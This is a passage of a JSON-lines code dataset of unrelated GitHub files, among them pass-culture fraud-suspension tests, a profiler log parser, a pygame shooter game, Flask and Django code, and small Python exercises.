pro_fraudulent_user_with_uppercase_domain.isActive\n\n # Do not handle sub-domains\n assert pro_fraudulent_user_with_subdomain.isActive\n assert beneficiary_fraudulent_user.isActive\n\n\n@pytest.mark.usefixtures(\"db_session\")\ndef test_dont_suspend_users_not_in_given_emails_providers_list():\n # Given\n fraudulent_emails_providers = [\"example.com\"]\n admin_user = AdminFactory(email=\"admin@example.net\")\n 
non_fraudulent_pro = ProFactory(email=\"jenesuispasunefraude@gmoil.com\")\n\n # When\n suspend_fraudulent_pro_by_email_providers(fraudulent_emails_providers, admin_user, dry_run=False)\n\n # Then\n assert non_fraudulent_pro.isActive\n\n\n@pytest.mark.usefixtures(\"db_session\")\ndef test_suspend_pro_user_with_many_offerers_and_delete_all_offerers():\n fraudulent_emails_providers = [\"example.com\"]\n admin_user = AdminFactory(email=\"admin@example.net\")\n fraudulent_user = ProFactory(\n email=\"jesuisunefraude@example.com\",\n )\n first_offerer = offerers_factories.OffererFactory()\n offerers_factories.UserOffererFactory(user=fraudulent_user, offerer=first_offerer)\n second_offerer = offerers_factories.OffererFactory()\n offerers_factories.UserOffererFactory(user=fraudulent_user, offerer=second_offerer)\n\n suspend_fraudulent_pro_by_email_providers(fraudulent_emails_providers, admin_user, dry_run=False)\n\n assert not fraudulent_user.isActive\n assert Offerer.query.count() == 0\n\n\n@pytest.mark.usefixtures(\"db_session\")\ndef test_delete_offerer_and_venue():\n # Given\n fraudulent_emails_providers = [\"example.com\"]\n admin_user = AdminFactory(email=\"admin@example.net\")\n fraudulent_user = ProFactory(\n email=\"jesuisunefraude@example.com\",\n )\n offerer = offerers_factories.OffererFactory()\n offerers_factories.UserOffererFactory(user=fraudulent_user, offerer=offerer)\n offerers_factories.VenueFactory(managingOfferer=offerer)\n\n # When\n suspend_fraudulent_pro_by_email_providers(fraudulent_emails_providers, admin_user, dry_run=False)\n\n # Then\n assert Offerer.query.count() == 0\n assert Venue.query.count() == 0\n\n\n@pytest.mark.usefixtures(\"db_session\")\ndef test_cancel_bookings_when_offerer_has_one_or_more():\n # Given\n fraudulent_emails_providers = [\"example.com\"]\n admin_user = AdminFactory(email=\"admin@example.net\")\n beneficiary1 = BeneficiaryGrant18Factory(email=\"beneficiary1@example.net\")\n beneficiary2 = BeneficiaryGrant18Factory(email=\"beneficiary2@example.net\")\n fraudulent_user = ProFactory(\n email=\"jesuisunefraude@example.com\",\n )\n offerer_with_bookings = offerers_factories.OffererFactory()\n offerers_factories.UserOffererFactory(user=fraudulent_user, offerer=offerer_with_bookings)\n offer1 = OfferFactory(venue__managingOfferer=offerer_with_bookings)\n offer2 = OfferFactory(venue__managingOfferer=offerer_with_bookings)\n stock1 = StockFactory(offer=offer1)\n stock2 = StockFactory(offer=offer2)\n booking1 = BookingFactory(user=beneficiary1, stock=stock1)\n booking2 = BookingFactory(user=beneficiary2, stock=stock2)\n\n # When\n suspend_fraudulent_pro_by_email_providers(fraudulent_emails_providers, admin_user, dry_run=False)\n\n # Then\n assert Offerer.query.count() == 1\n assert Venue.query.count() == 2\n assert Offer.query.count() == 2\n assert Stock.query.count() == 2\n assert Booking.query.count() == 2\n assert booking1.status is BookingStatus.CANCELLED\n assert booking1.cancellationReason is BookingCancellationReasons.FRAUD\n assert booking2.status is BookingStatus.CANCELLED\n assert booking2.cancellationReason is BookingCancellationReasons.FRAUD\n","repo_name":"pass-culture/pass-culture-main","sub_path":"api/tests/scripts/suspend_suspected_fraudulent_pro_users_test.py","file_name":"suspend_suspected_fraudulent_pro_users_test.py","file_ext":"py","file_size_in_byte":6052,"program_lang":"python","lang":"en","doc_type":"code","stars":86,"dataset":"github-code","pt":"29"} +{"seq_id":"22591737077","text":"__author__ = 'jim'\n\nimport os\nimport 
sys\nimport argparse\n\nrow_names = [\n    'IA Bottleneck',\n    'IA SOL',\n    'Primitive Setup Bottleneck',\n    'Primitive Setup SOL',\n    'ROP Bottleneck',\n    'ROP SOL',\n    'Rasterization Bottleneck',\n    'Rasterization SOL',\n    'SHD Bottleneck',\n    'SHD SOL',\n    'TEX Bottleneck',\n    'TEX SOL',\n    'FB Bottleneck',\n    'FB SOL',\n    'L2 Bottleneck',\n    'tex_cache_hitrate',\n    'l2_read_bytes_mem',\n    'l2_read_bytes_tex',\n    'shd_tex_read_bytes',\n    'shd_tex_requests',\n    'inst_executed_ps',\n    'inst_executed_ps_ratio',\n    'inst_executed_vs',\n    'inst_executed_vs_ratio',\n    'setup_primitive_count',\n    'shaded_pixel_count'\n]\n\n\ndef value(line):\n    line_split = str(line).split(' ')\n    try:\n        value_col_idx = line_split.index('value:')\n    except ValueError:\n        print(\"'value:' was not found in line.\")\n        return\n\n    if len(line_split) <= value_col_idx + 1:\n        return -1.0\n\n    val_str = line_split[value_col_idx + 1]\n    rval = -1.0\n    try:\n        rval = float(val_str)\n    except ValueError:\n        print('value was not a float: {}'.format(val_str))\n\n    return rval\n\n\ndef parse_file(path):\n    counters = []\n    # open() returns a file object; os.open() returns a raw file descriptor\n    with open(path, 'r') as f:\n        for line in f.readlines():\n            matches = [x for x in row_names if line.startswith(x)]\n            if not matches:\n                continue\n            counter = matches[0]\n            v = value(line)\n            if v > -1.0:\n                counters.append((counter, v))\n\n    return counters\n\n\ndef parse_args():\n    parser = argparse.ArgumentParser()\n    parser.add_argument('-f', help='Directory with files to parse', type=str)\n    parser.add_argument('-o', help='Output directory', type=str)\n\n    args = parser.parse_args(args=sys.argv[1:])\n    return args\n\n\ndef main():\n    args = parse_args()\n\n    if not os.path.exists(args.f):\n        print('Path {} does not exist'.format(args.f))\n        return\n\n    files = os.listdir(args.f)\n\n    files_counters = dict()\n    for p in files:\n        # os.listdir returns bare names, so join them with the directory\n        files_counters[p] = parse_file(os.path.join(args.f, p))\n\n    return\n\n\nif __name__ == '__main__':\n    main()\n","repo_name":"jimpelton/subvol","sub_path":"profile_parser/parse_nvpm.py","file_name":"parse_nvpm.py","file_ext":"py","file_size_in_byte":1999,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"29"}
+{"seq_id":"8845718627","text":"# Stacks and queues are dynamic sets in which a prespecified element is removed or added, respectively.\n# In a stack, the most recently added element is removed first. This is called last-in, first-out (LIFO).\n# In a queue, the element removed is always the one that has been in the set for the longest time. 
This is called first-in, first-out (FIFO).\n\n# Stacks\nstack = [2, 4, 6]\nstack.append(5)\nprint(stack)\nstack.pop()\nprint(stack)\n\n# Queues\nfrom collections import deque\nqueue = deque([2, 4, 6])\nqueue.append(5)\nprint(queue)\nqueue.popleft()\nprint(queue)\nqueue.pop()\nprint(queue)","repo_name":"SohamK2111/DSA","sub_path":"Elementary Data Structures/Stacks_and_Queues.py","file_name":"Stacks_and_Queues.py","file_ext":"py","file_size_in_byte":581,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"29"}
+{"seq_id":"74499504719","text":"# from machine import Pin\nimport time\nimport machine\n\ndef callbackup(p):\n    '''time.sleep_ms(300)\n    flag = p.value()\n    while True:\n        vol_val = adc.read()\n        pwm.duty(vol_val)'''\n    \n    #flag = p.value()\n    print(adc.read())\n    time.sleep(0.1)\n    print(adc.read())\n    print(p.value())\n\n\ndef callback(p):\n    print(\"hahahah i am callbackdown\")\n    print(adc.read())\n    time.sleep(0.1)\n    print(adc.read())\n    print(p.value())\n    voltage = p.value()\n    if voltage ==0:\n        while True:\n            vol_val = adc.read()\n            pwm.duty(vol_val)\n    else:\n        pwm.duty(10)\n        time.sleep(3)\n\nadc = machine.ADC(0)\npwm = machine.PWM(machine.Pin(15))\npwm.freq(60)\npwm.duty(1000)\ntime.sleep(2)\nbutton = machine.Pin(2,machine.Pin.IN)\n\n#button.irq(trigger=machine.Pin.IRQ_RISING, handler=callbackup)\nbutton.irq(trigger=machine.Pin.IRQ_FALLING | machine.Pin.IRQ_RISING, handler=callback)\n\npwm.duty(10)","repo_name":"ty528146/200okgroup","sub_path":"lab2main10.py","file_name":"lab2main10.py","file_ext":"py","file_size_in_byte":975,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"29"}
+{"seq_id":"30499158762","text":"from yap5 import *\nfrom random import randint\nfrom pyglet import gl\n\nstart = Vector(0, 0)\n\n\ndef setup():\n    gl.glEnable(gl.GL_BLEND)\n    gl.glBlendFunc(gl.GL_SRC_ALPHA, gl.GL_ONE_MINUS_SRC_ALPHA)\n\n    background(Color(\"white\"))\n    size(300, 300)\n\n\ndef draw():\n    line(\n        start,\n        Vector(randint(0, WIDTH), HEIGHT),\n        Theme(\n            stroke=Color(\n                randint(0, 50),\n                randint(0, 255),\n                randint(0, 255),\n                100),\n            stroke_weight=12\n        )\n    )\n    start.x = (start.x + 1) % WIDTH\n\n\nrun()\n","repo_name":"fenjalien/yap5","sub_path":"examples/random_lines.py","file_name":"random_lines.py","file_ext":"py","file_size_in_byte":580,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"29"}
+{"seq_id":"8529339580","text":"from functools import partial\nfrom socketserver import StreamRequestHandler, TCPServer\n\nclass EchoHandler(StreamRequestHandler):\n    def __init__(self, *args, ack, **kwargs):\n        self.ack = ack\n        super().__init__(*args, **kwargs)\n    \n    def handle(self):\n        for line in self.rfile:\n            self.wfile.write(b'GOT: ' + line)\n\nserv = TCPServer(('', 15000), partial(EchoHandler, ack=b'RECEIVE:'))\nserv.serve_forever()","repo_name":"ziliihe/python_cookbook_3rd","sub_path":"pythoncookbook/echo.py","file_name":"echo.py","file_ext":"py","file_size_in_byte":439,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"29"}
+{"seq_id":"4388993964","text":"import pygame as pg\nimport random\nimport math\nimport pickle\nimport os\n\n\npg.init()\n\nclock = pg.time.Clock()\nfps = 20\nmax_hp = 20\nhp = 20\nscore = 0\nif os.path.exists('./highscore.dat'):\n    highscore = pickle.load(open(\"highscore.dat\", \"rb\"))\nelse:\n    highscore = 0\nlevel = 1\nenemies_in_level = 20\nenemy_counter = 20\nenemies_alive = 0\nx_distance = 0\ny_distance = 0\n\nscreen_width = 
1400\nscreen_height = 800\n\nscreen = pg.display.set_mode((screen_width, screen_height))\npg.display.set_caption(\"Defense\")\n\nbullet_img = pg.image.load(\"laserYellowVertical.png\").convert_alpha()\nbullet_img = pg.transform.scale(bullet_img, (10, 10))\nbullet2_img = pg.image.load(\"laserRedVertical.png\").convert_alpha()\nbullet2_img = pg.transform.scale(bullet2_img, (10, 10))\nbg = pg.image.load(\"bg_castle.png\").convert_alpha()\nbg = pg.transform.scale(bg, (screen_width, screen_height))\nmouse = pg.transform.scale(pg.image.load(\"crosshair.png\"), (30, 30))\nscore_font = pg.font.Font(\"Turok.ttf\", 30)\nbig_font = pg.font.Font(\"Turok.ttf\", 80)\n\npg.mouse.set_cursor((8,8),(0,0),(0,0,0,0,0,0,0,0),(0,0,0,0,0,0,0,0))\nscreen.blit(bg, (0, 0))\n\nbullet_group = pg.sprite.Group()\nenemy_group = pg.sprite.Group()\n\n\nclass Player:\n def __init__(self, x, y):\n image = pg.image.load(\"player1.png\").convert_alpha()\n self.image = pg.transform.scale(image, (50, 50))\n self.image = pg.transform.scale(image, (50, 50))\n self.image.set_colorkey((255, 255, 255))\n self.rect = self.image.get_rect()\n self.rect.centerx = x\n self.rect.centery = y\n self.fired = False\n\n def update(self, x, y):\n pos = pg.mouse.get_pos()\n x_pos = pos[0] - x\n y_pos = -(pos[1] - y)\n angle = math.degrees(math.atan2(y_pos, x_pos))\n self.img = pg.transform.rotate(self.image, angle-90)\n self.img.set_colorkey((255, 255, 255))\n self.rect = self.img.get_rect()\n self.rect.centerx = x\n self.rect.centery = y\n\n screen.blit(self.img, self.rect)\n\n def shoot(self):\n pos = pg.mouse.get_pos()\n x_pos = pos[0] - self.rect.centerx\n y_pos = -(pos[1] - self.rect.centery)\n self.angle = math.degrees(math.atan2(y_pos, x_pos))\n\n if pg.mouse.get_pressed()[0] and self.fired == False:\n self.fired = True\n bullet = Bullet(pg.transform.rotate(bullet_img, self.angle-90), self.rect.centerx, self.rect.centery, self.angle, 1)\n bullet_group.add(bullet)\n\n if pg.mouse.get_pressed()[0] == False:\n self.fired = False\n\n\nclass Bullet(pg.sprite.Sprite):\n def __init__(self, image, x, y, angle, shooter):\n pg.sprite.Sprite.__init__(self)\n self.shooter = shooter\n self.image = image\n self.rect = self.image.get_rect()\n self.rect.x = x\n self.rect.y = y\n self.angle = math.radians(angle)\n self.speed = 20\n self.dx = math.cos(self.angle) * self.speed\n self.dy = -(math.sin(self.angle) * self.speed)\n self.time = 200\n\n def update(self):\n self.time -= 1\n if self.time == 0:\n self.kill()\n if self.rect.right < 0 or self.rect.left >= screen_width:\n self.dx *= -1\n self.image = pg.transform.rotate(self.image, self.angle-90)\n if self.rect.bottom < 0 or self.rect.top >= screen_height:\n self.dy *= -1\n self.image = pg.transform.rotate(self.image, self.angle-90)\n\n self.rect.x += self.dx\n self.rect.y += self.dy\n\n def draw(self):\n screen.blit(self.image, self.rect)\n\n\nclass Enemy(pg.sprite.Sprite):\n def __init__(self, x, y, number, speed, stop_dist):\n super().__init__()\n self.number = number\n image = pg.image.load(f\"enemy-shooter{self.number}.png\").convert_alpha()\n self.image = pg.transform.scale(image, (50, 50))\n self.image = pg.transform.scale(image, (50, 50))\n self.image.set_colorkey((255, 255, 255))\n self.rect = self.image.get_rect()\n self.rect.centerx = x\n self.rect.centery = y\n self.cooldown = 50\n self.speed = speed\n self.stop_dist = stop_dist\n self.move_lenght = 0\n self.x_move = 0\n self.y_move = 0\n\n def update(self, x, y):\n x_pos = player.rect.centerx - x\n y_pos = -(player.rect.centery - y)\n angle 
= math.degrees(math.atan2(y_pos, x_pos))\n self.img = pg.transform.rotate(self.image, angle-90)\n self.img.set_colorkey((255, 255, 255))\n self.rect = self.img.get_rect()\n self.rect.centerx = x\n self.rect.centery = y\n self.angle = math.radians(angle)\n self.dx = math.cos(self.angle) * self.speed\n self.dy = -(math.sin(self.angle) * self.speed)\n dist = math.sqrt((player.rect.centerx - self.rect.centerx) ** 2 + (player.rect.centery - self.rect.centery) ** 2)\n if dist > self.stop_dist:\n self.rect.centerx += self.dx\n self.rect.centery += self.dy\n if dist > self.stop_dist*2:\n self.rect.centerx += self.dx\n self.rect.centery += self.dy\n\n screen.blit(self.img, self.rect)\n\n def shoot(self):\n x_pos = player.rect.centerx - self.rect.centerx\n y_pos = -(player.rect.centery - self.rect.centery)\n self.angle = math.degrees(math.atan2(y_pos, x_pos))\n if self.cooldown > 0:\n self.cooldown -= 1\n if self.cooldown == 0:\n self.cooldown = 50\n bullet = Bullet(pg.transform.rotate(bullet2_img, self.angle-90), self.rect.centerx, self.rect.centery, self.angle, 0)\n bullet_group.add(bullet)\n\n def random_move(self):\n random_move = random.randint(0, 200)\n if random_move == 10:\n self.x_move = random.randint(-8, 8)\n self.y_move = random.randint(-8, 8)\n self.move_lenght = random.randint(5, 15)\n if self.move_lenght != 0:\n self.rect.centerx += self.x_move\n self.rect.centery += self.y_move\n self.move_lenght -= 1\n\n\ndef health_bar(hp, max_hp):\n color1 = round(255/max_hp*hp)\n color2 = 255-color1\n if color1 < 0:\n color1 = 0\n if color2 < 0:\n color2 = 0\n if color1 > 255:\n color1 = 255\n if color2 > 255:\n color2 = 255\n pg.draw.rect(screen, (0, 0, 0), pg.Rect(27, 27, 10*max_hp+6, 36))\n pg.draw.rect(screen, (color2, color1, 0), pg.Rect(30, 30, 10*hp, 30))\n\n\ndef background(x_distance, y_distance):\n bg_rect = pg.Rect(0+x_distance, 0+y_distance, 1400, 800)\n screen.blit(bg, bg_rect)\n bg_rect = pg.Rect(-1400 + x_distance, 0 + y_distance, 1400, 800)\n screen.blit(bg, bg_rect)\n bg_rect = pg.Rect(1400 + x_distance, 0 + y_distance, 1400, 800)\n screen.blit(bg, bg_rect)\n bg_rect = pg.Rect(0 + x_distance, 800 + y_distance, 1400, 800)\n screen.blit(bg, bg_rect)\n bg_rect = pg.Rect(0 + x_distance, -800 + y_distance, 1400, 800)\n screen.blit(bg, bg_rect)\n bg_rect = pg.Rect(1400 + x_distance, 800 + y_distance, 1400, 800)\n screen.blit(bg, bg_rect)\n bg_rect = pg.Rect(-1400 + x_distance, 800 + y_distance, 1400, 800)\n screen.blit(bg, bg_rect)\n bg_rect = pg.Rect(1400 + x_distance, -800 + y_distance, 1400, 800)\n screen.blit(bg, bg_rect)\n bg_rect = pg.Rect(-1400 + x_distance, -800 + y_distance, 1400, 800)\n screen.blit(bg, bg_rect)\n\n\ndef draw_text(text, font, text_col, x, y):\n img = font.render(text, True, text_col)\n screen.blit(img, (x, y))\n\n\ndef next_level(enemies_in_level):\n enemies_in_level += 5\n return enemies_in_level\n\n\ndef cursor(cursor):\n pos = pg.mouse.get_pos()\n screen.blit(cursor, (pos[0]-15, pos[1]-15))\n\n\ndef restart(run):\n game_lost = True\n draw_text(\"YOU LOST!\", big_font, (200, 200, 30), 530, 250)\n draw_text(\"press r to restart\", big_font, (200, 200, 30), 400, 400)\n pg.display.update()\n while game_lost:\n for event in pg.event.get():\n if event.type == pg.QUIT:\n run = False\n game_lost = False\n if event.type == pg.KEYDOWN:\n if event.key == pg.K_r:\n game_lost = False\n return run\n\n\ndef pause(run):\n game_paused = True\n draw_text(\"GAME PAUSED\", big_font, (200, 200, 30), 480, 300)\n pg.display.update()\n while game_paused:\n for event in 
pg.event.get():\n if event.type == pg.QUIT:\n run = False\n game_paused = False\n if event.type == pg.KEYDOWN:\n if event.key == pg.K_p:\n game_paused = False\n return run\n\n\nplayer = Player(675, 375)\n\n\nrun = True\nwhile run:\n clock.tick(fps)\n screen.fill((155, 155, 155))\n\n if score > highscore:\n highscore = score\n if enemy_counter > 0:\n for i in range(20):\n n = random.randint(1, 1000)\n t = random.randint(0, 1)\n if n == 25:\n enemy = Enemy(i * 50, 1400 * t, random.randint(1, 4), random.randint(2, 6), random.randint(130, 270))\n enemy_group.add(enemy)\n enemies_alive += 1\n enemy_counter -= 1\n for i in range(20):\n n = random.randint(1, 1000)\n t = random.randint(0, 1)\n if n == 25:\n enemy = Enemy(1400 * t, i * 50, random.randint(1, 4), random.randint(2, 6), random.randint(130, 270))\n enemy_group.add(enemy)\n enemies_alive += 1\n enemy_counter -= 1\n\n key = pg.key.get_pressed()\n if key[pg.K_UP]:\n if y_distance*-1 < -800:\n if player.rect.centery > 25:\n player.rect.centery -= 10\n else:\n if player.rect.centery > 375:\n player.rect.centery -= 10\n else:\n y_distance += 10\n for enemy in enemy_group:\n enemy.rect.centery += 10\n for bullet in bullet_group:\n bullet.rect.y += 10\n if key[pg.K_DOWN]:\n if y_distance*-1 > 800:\n if player.rect.centery < 775:\n player.rect.centery += 10\n else:\n if player.rect.centery < 375:\n player.rect.centery += 10\n else:\n y_distance -= 10\n for enemy in enemy_group:\n enemy.rect.centery -= 10\n for bullet in bullet_group:\n bullet.rect.y -= 10\n if key[pg.K_LEFT]:\n if x_distance * -1 < -1400:\n if player.rect.centerx > 25:\n player.rect.centerx -= 10\n else:\n if player.rect.centerx > 675:\n player.rect.centerx -= 10\n else:\n x_distance += 10\n for enemy in enemy_group:\n enemy.rect.centerx += 10\n for bullet in bullet_group:\n bullet.rect.x += 10\n if key[pg.K_RIGHT]:\n if x_distance*-1 > 1400:\n if player.rect.centerx < 1375:\n player.rect.centerx += 10\n else:\n if player.rect.centerx < 675:\n player.rect.centerx += 10\n else:\n x_distance -= 10\n for enemy in enemy_group:\n enemy.rect.centerx -= 10\n for bullet in bullet_group:\n bullet.rect.x -= 10\n\n background(x_distance, y_distance)\n player.shoot()\n\n for enemy in enemy_group:\n enemy.shoot()\n enemy.random_move()\n\n bullet_group.update()\n bullet_group.draw(screen)\n player.update(player.rect.centerx, player.rect.centery)\n\n for enemy in enemy_group:\n enemy.update(enemy.rect.centerx, enemy.rect.centery)\n for bullet in bullet_group:\n if pg.sprite.collide_rect(enemy, bullet):\n if bullet.shooter == 1:\n enemy.kill()\n bullet.kill()\n score += 1\n enemies_alive -= 1\n\n for bullet in bullet_group:\n if pg.sprite.collide_rect(player, bullet):\n if bullet.shooter == 0:\n hp -= 1\n bullet.kill()\n\n if hp <= 0:\n run = restart(run)\n x_distance = 0\n y_distance = 0\n background(x_distance, y_distance)\n if score == highscore:\n pickle.dump(highscore, open(\"highscore.dat\", \"wb\"))\n level = 1\n score = 0\n enemy_counter = 20\n enemies_in_level = 20\n enemies_alive = 0\n enemy_group.empty()\n bullet_group.empty()\n player = Player(675, 375)\n hp = max_hp\n\n health_bar(hp, max_hp)\n draw_text(f\"enemies alive: {enemies_alive}\", score_font, (200, 200, 30), 1100, 30)\n draw_text(f\"level: {level}\", score_font, (200, 200, 30), 1100, 70)\n draw_text(f\"score: {score}\", score_font, (200, 200, 30), 800, 30)\n draw_text(f\"highscore: {highscore}\", score_font, (200, 200, 30), 800, 70)\n\n if enemy_counter == 0 and enemies_alive == 0:\n enemy_counter = 
next_level(enemies_in_level)\n        enemies_in_level = enemy_counter\n        level += 1\n        bullet_group.empty()\n        x_distance, y_distance = 0, 0\n        background(x_distance, y_distance)\n        player = Player(675, 375)\n\n    for event in pg.event.get():\n        if event.type == pg.QUIT:\n            run = False\n        if event.type == pg.KEYDOWN:\n            if event.key == pg.K_p:\n                run = pause(run)\n    cursor(mouse)\n    pg.display.update()\n\npg.quit()","repo_name":"erikhomza/shooter","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":13484,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"29"}
+{"seq_id":"35408344130","text":"# -*- coding: utf-8 -*-\n\nimport flask, json\n\nfrom application import app\nfrom application.mod_api.views_entries import api_get_entries\nfrom application.mod_api.models_entry import Entry, EntryDAO\nfrom application.mod_web.presentable_object import PresentableEntry\nfrom application.utils.pagination_services import Pagination\n\nfrom application.mod_web.utils_display_on_web import UtilsDisplayOnWeb\nfrom application.mod_web.views_user_settings import generate_token\n\n\n@app.route('/', methods=['GET'], defaults={'page': 1})\n@app.route('/strona/<int:page>', methods=['GET'])\ndef main(page):\n    if flask.request.cookies.get('op_token', None) is None:\n        return generate_token(redirect_to=flask.url_for('main'))\n\n    return _load_page_with_entries(title=u'Najnowsze', page=page)\n\n\n@app.route('/najlepsze', methods=['GET'], defaults={'page': 1})\n@app.route('/najlepsze/strona/<int:page>', methods=['GET'])\ndef main_top(page):\n    return _load_page_with_entries(title=u'Top plusowane',\n                                   order_by=\"votes_up desc\",\n                                   page=page)\n\n\ndef _load_page_with_entries(title=None, page=None, order_by=None):\n    user_token = flask.request.cookies.get('op_token')\n    items_per_page = app.config['ITEMS_PER_PAGE']\n    response, status = api_get_entries(order_by=order_by,\n                                       per_page=items_per_page,\n                                       user_op_token=user_token,\n                                       page=page)\n    response_json = json.loads(response.data)\n\n    p_entries = list()\n    for entry_json in response_json[\"entries\"]:\n        entry = Entry.from_json(entry_json)\n        p_entries.append(PresentableEntry(entry))\n\n    if not p_entries and page != 1:\n        flask.abort(404)\n\n    disp_web = UtilsDisplayOnWeb(user_token=user_token)\n    entries_count = EntryDAO.get_entries_count()\n\n    pagination = Pagination(page, items_per_page, entries_count)\n    return flask.render_template('web/main.html', title=title,\n                                 p_entries=p_entries,\n                                 p_recommended_hashtags=disp_web.get_recommended_hashtags(),\n                                 p_popular_hashtags=disp_web.get_popular_hashtags(),\n                                 user_notifications_count=disp_web.get_user_notifications_count(),\n                                 user_settings=disp_web.get_user_settings(),\n                                 pagination=pagination)\n","repo_name":"tomkowz/anonymous-discussions","sub_path":"application/mod_web/views_main.py","file_name":"views_main.py","file_ext":"py","file_size_in_byte":2481,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"29"}
+{"seq_id":"1158548758","text":"import datetime\n\nfrom rest_framework import serializers\nfrom django.core.exceptions import ImproperlyConfigured, ObjectDoesNotExist\nfrom test.models import Budget,GlavBudget\n\ndef get_func(field):\n    ''' return an overridden to_internal_value method\n    for foreign_key fields, for the case when\n    a child element references a non-existent parent '''\n    def fk_to_internal_value(data=None):\n        self = field\n        if self.pk_field is not None:\n            data = self.pk_field.to_internal_value(data)\n        queryset = self.get_queryset()\n        try:\n            if isinstance(data, bool):\n                raise TypeError\n            return queryset.get(pk=data)\n        except ObjectDoesNotExist:\n            # this is the key line: create the object here,\n            # and if a row with the same pk shows up later, it will be updated properly\n            return queryset.create(pk=data)\n        except (TypeError, ValueError):\n            self.fail('incorrect_type', data_type=type(data).__name__)\n    return fk_to_internal_value\n\n\ndef get_ser(model):\n    ''' return a serializer for our model:\n    since the model is not known in advance, neither is the serializer,\n    so we take the model as input and build a serializer for it '''\n    class ParseModelSerizer (serializers.ModelSerializer):\n        class Meta:\n            fields='__all__'\n\n        def get_fields(self):\n            ''' override the method for fk fields,\n            in case they reference a non-existent instance '''\n            fields=super().get_fields()\n            for field in fields.values():\n                if isinstance(field,serializers.PrimaryKeyRelatedField):\n                    field.to_internal_value=get_func(field)\n            return fields\n    ParseModelSerizer.Meta.model=model\n    return ParseModelSerizer","repo_name":"ChepelDrepel/test_hh_nii","sub_path":"test/serializers.py","file_name":"serializers.py","file_ext":"py","file_size_in_byte":2140,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"29"}
+{"seq_id":"364280361","text":"import sys\r\nsys.stdin = open('input.txt', 'rt')\r\n\r\nn = int(input())\r\nnc = list(map(int, input().split()))\r\n# print(nc)\r\n\r\n\r\ndef digits_sum(x):\r\n    total = 0\r\n    while x > 0:\r\n        total += x % 10\r\n        x //= 10  # integer division; /= would turn x into a float\r\n    return total\r\n\r\n\r\nfor x in nc:\r\n    print(digits_sum(x))\r\n","repo_name":"j0n9hyun/python-ps","sub_path":"1-5.py","file_name":"1-5.py","file_ext":"py","file_size_in_byte":280,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"29"}
+{"seq_id":"24814287705","text":"\"\"\"CLI errors.\"\"\"\nfrom typing import Any\n\n\ndef format_validation_error(e: dict[str, Any]) -> str:\n    \"\"\"Format the error message of a pydantic validation error.\"\"\"\n    error_type = e[\"type\"]\n    loc = \".\".join(str(loc) for loc in e[\"loc\"])\n    if error_type == \"value_error.missing\":\n        return f\"{loc} is a required property\"\n    elif error_type == \"value_error.extra\":\n        return f\"Additional properties are not allowed ({loc} was unexpected)\"\n    elif error_type == \"type_error.enum\":\n        permitted = [str(enum.value) for enum in e[\"ctx\"][\"enum_values\"]]\n        return (\n            f\"{loc} has an invalid value; permitted values are: {', '.join(permitted)}\"\n        )\n    elif error_type == \"value_error.list.min_items\":\n        min_items = e[\"ctx\"][\"limit_value\"]\n        return f\"{loc}: at least {min_items} item is required\"\n    else:\n        msg = e.get(\"msg\", \"unknown error\")\n        return f\"{loc}: {msg}\"\n","repo_name":"boostsecurityio/scanner-registry-action","sub_path":"boostsec/registry_validator/errors.py","file_name":"errors.py","file_ext":"py","file_size_in_byte":931,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"29"}
+{"seq_id":"21005113117","text":"import environment.task_generator as task_generator\nfrom .shapes import *\nfrom buildings import *\n\nfrom helper.placement_rules import *\nfrom helper.file_handler import *\nfrom settings import *\n\nimport random\nimport json\n\n# create a nice output when displaying the entire grid\nnp.set_printoptions(\n    edgeitems=30, linewidth=100000, formatter=dict(float=lambda x: \"%.3g\" % x)\n)\n\n\nclass Environment:\n    \"\"\"\n    Profit Game Environment\n    \"\"\"\n\n    def __init__(self, width, height, turns, products, time=120):\n        
\"\"\"initialize environment\n\n Args:\n width (int): width of the grid\n height (int): height of the grid\n turns (int): maximum number of turns\n products (dict): dictonary of all possible products; each with a resource recipe and the #points it is worth\n \"\"\"\n self.width = width\n self.height = height\n self.turns = turns\n self.products = products\n self.time = time\n\n self.task_generator = task_generator.TaskGenerator(self, seed=42)\n\n self.empty()\n\n def empty(self):\n self.buildings = []\n self.obstacles = []\n self.grid = np.full((self.height, self.width), \" \")\n\n def reset_resources(self):\n for building in self.buildings:\n building.reset_resources()\n\n def add_building(self, building, force=False):\n \"\"\"Adds the individual tiles of a new building to the grid, provided that it has a valid position (see `Environment.is_legal_position`);\n\n Args:\n building (Building): Factory, Deposit, Obstacle, ...\n force: only use this option if you are certain that it is a legal position (reduce computation)\n\n Returns:\n Building: returns building object or None if building could not be added\n \"\"\"\n assert building not in self.buildings\n\n if not force and not self.is_legal_position(building):\n return None\n\n for (tile_x, tile_y, element) in iter(building):\n if self.grid[tile_y, tile_x] == \" \":\n self.grid[tile_y, tile_x] = element\n else:\n # conveyor tunnel\n self.grid[tile_y, tile_x] = \"O\"\n\n if type(building) == Obstacle:\n self.obstacles.append(building)\n return building\n\n for other_building in self.buildings:\n if self.would_connect_to(other_building, building):\n other_building.add_connection(building)\n if self.would_connect_to(building, other_building):\n building.add_connection(other_building)\n\n self.buildings.append(building)\n\n return building\n\n def remove_building(self, building):\n \"\"\"Removes the individual tiles of a new building from the grid;\n\n Args:\n building (Building): Factory, Deposit, Obstacle, ...\n\n Returns:\n Building: returns removed building object\n \"\"\"\n assert building in self.buildings or building in self.obstacles\n\n for (tile_x, tile_y, element) in iter(building):\n if self.grid[tile_y, tile_x] == \"O\":\n self.grid[tile_y, tile_x] = \"<\"\n else:\n self.grid[tile_y, tile_x] = \" \"\n\n if type(building) == Obstacle:\n self.obstacles.remove(building)\n return building\n\n for other_building in self.buildings:\n if building in other_building.connections:\n other_building.remove_connection(building)\n building.clear_connections()\n\n self.buildings.remove(building)\n\n return building\n\n def add_buildings(self, buildings, force=False):\n for building in buildings:\n self.add_building(building, force=force)\n\n def is_legal_position(self, 